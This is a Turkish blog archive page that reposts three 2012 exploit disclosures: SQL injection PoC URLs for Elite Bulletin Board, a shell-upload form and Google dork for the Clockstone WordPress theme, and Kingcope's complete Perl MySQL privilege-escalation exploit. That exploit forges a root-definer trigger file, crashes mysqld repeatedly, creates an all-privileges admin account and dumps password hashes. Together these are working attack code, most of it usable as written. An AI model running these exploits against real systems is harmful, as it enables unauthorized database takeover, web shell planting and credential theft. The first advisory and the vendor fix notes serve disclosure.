Archive for 26 Aralık 2012

Elite Bulletin Board 2.1.21 Multiple SQL Injection Vulnerabilities

Elite Bulletin Board 2.1.21 Versiyonunda SQL Açığı bulundu. Açığın oluşum yerleri, Açığın ne şekilde sömürüldüğü, Açık hakkında detaylı bigiler ve açık bulucununun açıklamaları şu şekilde;

Advisory ID: HTB23133
Product: Elite Bulletin Board
Vendor: elite-board.us
Vulnerable Version(s): 2.1.21 and probably prior
Tested Version: 2.1.21
Vendor Notification: November 28, 2012 
Vendor Patch: December 6, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-5874
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Elite Bulletin Board, which can be exploited to perform SQL injection attacks.


1) Multiple SQL injection vulnerabilities in Elite Bulletin Board: CVE-2012-5874

The vulnerabilities exist due to insufficient sanitation of user-supplied data in URI in the "update_whosonline_reg()" and "update_whosonline_guest()" functions within the "/includes/user_function.php" script. 

A remote attacker can send a specially crafted HTTP request to one of the following scripts and execute arbitrary SQL commands in application's database: 
- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php 
- viewtopic.php

Successful exploitation of the vulnerabilities may allow attacker to extract sensitive data from the application's database, and even get complete control over the application under certain conditions (such as insecure configuration of database and web servers).

The following PoC (Proof of Concept) codes demonstrate the vulnerabilities by displaying version of the MySQL server:


http://[host]/checkuser.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/groups.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/index.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/login.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/quicklogin.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/register.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/

http://[host]/viewboard.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

http://[host]/viewtopic.php/%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&tid=1


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Elite Bulletin Board v2.1.22

More Information:
http://elite-board.us/Community/viewtopic.php?bid=1&tid=310
http://sourceforge.net/projects/elite-board/files/Elite%20Bulletin%20Board%20v2/2.1.22/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23133 - https://www.htbridge.com/advisory/HTB23133 - Multiple SQL Injection Vulnerabilities in Elite Bulletin Board.
[2] Elite Bulletin Board - http://elite-board.us/ - Elite Bulletin Board is an advanced Bulletin Board program that provides advanced features such as CAPTCHA, sub-board, skinning ability, multilingual, commercial password encryption, and much more.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

WordPress Clockstone and other CMSMasters Theme File Upload Vulnerabilities

WordPress Clockstone and other CMSMasters Theme eklentisinde dosya Upload açığı bulundu.
Açık sayesinde zararlı sheller upload edilebilmekte, upload shell sayesinde diğer sitelerede erişim imkanı sağlanabilmektedir. Açık kapanına kadar “clockstone/theme/functions/upload.php” dizininin geçici olarak kaldırılması, açık kapanadıktan sonra yüklenmesi gerekmekterir.

# Exploit Title: [Clockstone and Various other CMSMasters Theme File Upload Vulnerabilities]
# Google Dork: ["wp-content/themes/clockstone"]
# Date: [12/18/2012]
# Exploit Author: [DigiP]
# Vendor Homepage: [http://cmsmasters.net/]
# Software Link: [http://themeforest.net/item/clockstone-ultimate-wordpress-theme/306607]
# Version: [1.2 and lower]

Clockstone WordPress Theme & Various CMSMasters Themes : File Upload Vulnerability Disclosure

A few weeks back I posted a warning on our site for users who used the Clockstone WordPress theme,
to remove it from their sites until CMSMasters had a chance to patch their theme(s). The flaw was a
file upload vulnerability, that allowed anyone to access a victim's site, by uploading whatever files they
wanted to the site. The nature of the flaw was not isolated to their Clockstone theme alone, so I worked
with CMSMasters to wait until they had a chance to patch this and their other themes as well. The code
that allowed this attack to happen, was in several files which did not require user authentication from
logged in WordPress users, and anyone visiting the url directly would be able to execute the script
directly.

As promised, here is the POC of the attack code:
##############################################################
#	Shell upload attack:<br />
#	<form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
#	<input type="text" name="url" value="./" /><br />
#	Please choose a file: <input name="uploadfile" type="file" /><br />
#	<input type="submit" value="Upload" />
#	</form> 
##############################################################

After a successful attack, you would see on your screen the name of your uploaded file in hash form,
which would be located in the same path as the upload script if using the code above. You can choose
pretty much anywhere to upload the file to though. This file was an MD5 hashed name, ending in the
file extension of the file you uploaded, but the script echoed back the file name, so it was easy to see
where your file was when done.

The vulnerable code in their theme was as follows:
##############################################################
#	<?php
#
#	if ($_POST['url']){ $uploaddir = $_POST['url']; }
#
#	$first_filename = $_FILES['uploadfile']['name'];
#
#	$filename = md5($first_filename);
#
#	$ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
#
#	$file = $uploaddir . basename($filename.'.'.$ext); 
#
#	if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
#		echo basename($filename.'.'.$ext);
#	} else {
#		echo 'error';
#	}
#
#	?>
##############################################################

We picked up this flaw because of our Attack Scanner plug-in, and seeing sites being attacked by others
running this theme. This lead us to investigate their theme to see what was happening. This was (and is)
an exploit being used in the wild against sites running the Clockstone theme, but does not appear to be
widely known at this time. At least, we could not find a copy of the flaw being published publicly
anywhere, which means this was most likely only used by a select few who knew of this flaw. After
notifying CMSMasters of the issue, they've now updated their code base and done their best to contact
users of their themes. - DigiP http://www.attack-scanner.com/

MySQL privilege elevation Exploit

sql-zeroBu Açık Nasıl çalışır:
* Saldırgan hedef için ‘dosya’ ayrıcalıklarına sahip bir mysql kullanıcı sahibi olabilir
* Saldırgan bu kullanıcı (kullanıcı ‘mysql’ ait) ile sistem dosyaları oluşturabilirsiniz
* Saldırgan mysql tablo için TETİK dosyaları oluşturmak mümkün
Bir mysql komut kullanıcı tarafından çalıştırıldığında tetikleyiciler, bir olay tetiklemek için kullanılabilecek
normal tetikleyiciler, kullanıcı için ‘bağlı’ olan ve bu kullanıcıların ayrıcalığı ile yapılacaktır.
Biz TRG dosyasını (gerçek tetikleyici dosya) herhangi bir içeriği yazabilirsiniz çünkü, biz girdi yazmak
gibi tetik için ekli kullanıcı açıklayan “root @ localhost” Varsayılan admin kullanıcı budur.
* Biz priorly geneli yüzden tetikleyici dosya tanınan sunucu yığın taşmasından yararlanabilirler.
Bu adım, mysql sunucu örneği ve yeniden bağlanma (sunucu respawn olacak) çökmesini olmadan, gerçekten önemli
tetikleyici dosya kabul olmayabilirdi.
Açığa ilişkin perl exploit

use DBI();

$|=1;

=for comment

MySQL privilege elevation Exploit
This exploit adds a new admin user.
By Kingcope

Tested on
* Debian Lenny (mysql-5.0.51a)
* OpenSuSE 11.4 (5.1.53-log)

How it works:
This exploit makes use of several things:
*The attacker is in possession of a mysql user with 'file' privileges for the target
*So the attacker can create files on the system with this user (owned by user 'mysql')
*So the attacker is able to create TRIGGER files for a mysql table
	triggers can be used to trigger an event when a mysql command is executed by the user,
	normally triggers are 'attached' to a user and will be executed with this users privilege.
	because we can write any contents into the TRG file (the actual trigger file), we write the entry
	describing the attached user for the trigger as "root@localhost" what is the default admin user.
* We make use of the stack overrun priorly discovered to flush the server config so the trigger file is recognized.
  This step is really important, without crashing the mysql server instance and reconnecting (the server will respawn)
  the trigger file would not be recognized.

So what the exploit does is:
* Connect to the MySQL Server
* Create a table named rootme for the trigger
* Create the trigger file in /var/lib/mysql//rootme.TRG
* Crash the MySQL Server to force it to respawn and recognize the trigger file (by triggering the stack overrun)
* INSERT a value into the table so the trigger event gets executed
* The trigger now sets all privileges of the current connecting user in the mysql.user table to enabled.
* Crash the MySQL Server again to force it reload the user configuration
* Create a new mysql user with all privileges set to enabled
* Crash again to reload configuration
* Connect by using the newly created user
* The new connection has ADMIN access now to all databases in mysql
* The user and password hashes in the mysql.user table are dumped for a convinient way to show the exploit succeeded
* As said the user has FULL ACCESS to the database now

Respawning of mysqld is done by mysqld_safe so this is not an issue in any configuration I've seen.
=cut

=for comment

user created for testing (file privs will minor privileges to only one database):

mysql> CREATE USER 'less'@'%' IDENTIFIED BY 'test';
Query OK, 0 rows affected (0.00 sec)

mysql> create database lessdb
    -> ;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON lessdb.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.02 sec)

mysql> GRANT FILE ON *.* TO 'less'@'%' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

login with new unprivileged user:
mysql> select * from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'less2'@'localhost' for table 'user'

=cut

=for comment

example attack output:

C:\Users\kingcope\Desktop>perl mysql_privilege_elevation.pl
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/lessdb3/rootme.TRG' LINES TER
MINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after ins
ert on rootme for each row\\nbegin \\nUPDATE mysql.user SET Select_priv=\\\'Y\\\
', Insert_priv=\\\'Y\\\', Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_p
riv=\\\'Y\\\', Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\
\', Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\', Reference
s_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\', Show_db_priv=\\\'Y
\\\', Super_priv=\\\'Y\\\', Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\
\'Y\\\', Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\', Repl_client_priv=\\\
'Y\\\', Create_view_priv=\\\'Y\\\', Show_view_priv=\\\'Y\\\', Create_routine_pri
v=\\\'Y\\\', Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\', ssl_type=
\\\'Y\\\', ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\', max_connections=\\\'Y\\\' WHERE
User=\\\'less3\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs
_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'lati
n1_swedish_ci\'\n';DBD::mysql::db do failed: Unknown table 'rootme' at mysql_pri
vilege_elevation.pl line 44.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 50.
DBD::mysql::db do failed: Lost connection to MySQL server during query at mysql_
privilege_elevation.pl line 59.
W00TW00T!
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = root, name = *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
Found a row: id = debian-sys-maint, name = *C5524C128621D8A050B6DD616B06862F9D64
B02C
Found a row: id = some1, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = monty, name = *BF06A06D69EC935E85659FCDED1F6A80426ABD3B
Found a row: id = less, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = r00ted, name = *EAD0219784E951FEE4B82C2670C9A06D35FD5697
Found a row: id = user, name = *14E65567ABDB5135D0CFD9A70B3032C179A49EE7
Found a row: id = less2, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = less3, name = *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
Found a row: id = rootedsql, name = *4149A2E66A41BD7C8F99D7F5DF6F3522B9D7D9BC

=cut

$user = "less10";
$password = "test";
$database = "lessdb10";
$target = "192.168.2.4";
$folder = "/var/lib/mysql/"; # Linux
$newuser = "rootedbox2";
$newuserpass = "rootedbox2";
$mysql_version = "51"; # can be 51 or 50

if ($mysql_version eq "50") {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
} else {
$inject =
"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
}

print $inject;#exit;
$inject2 =
"SELECT 'TYPE=TRIGGERNAME\\ntrigger_table=rootme;' into outfile '".$folder.$database."/atk.TRN' FIELDS ESCAPED BY ''";

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});
eval { $dbh->do("DROP TABLE rootme") };
$dbh->do("CREATE TABLE rootme (rootme VARCHAR(256));");
$dbh->do($inject);
$dbh->do($inject2);

$a = "A" x 10000;
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("INSERT INTO rootme VALUES('ROOTED');");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("CREATE USER '$newuser'\@'%' IDENTIFIED BY '$newuserpass';");
$dbh->do("GRANT ALL PRIVILEGES ON *.* TO '$newuser'\@'%' WITH GRANT OPTION;");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:host=$target;",
                       $newuser, $newuserpass,
                       {'RaiseError' => 0});

my $sth = $dbh->prepare("SELECT * FROM mysql.user");
$sth->execute();

print "W00TW00T!\n";

while (my $ref = $sth->fetchrow_hashref()) {
print "Found a row: id = $ref->{'User'}, name = $ref->{'Password'}\n";
}
$sth->finish();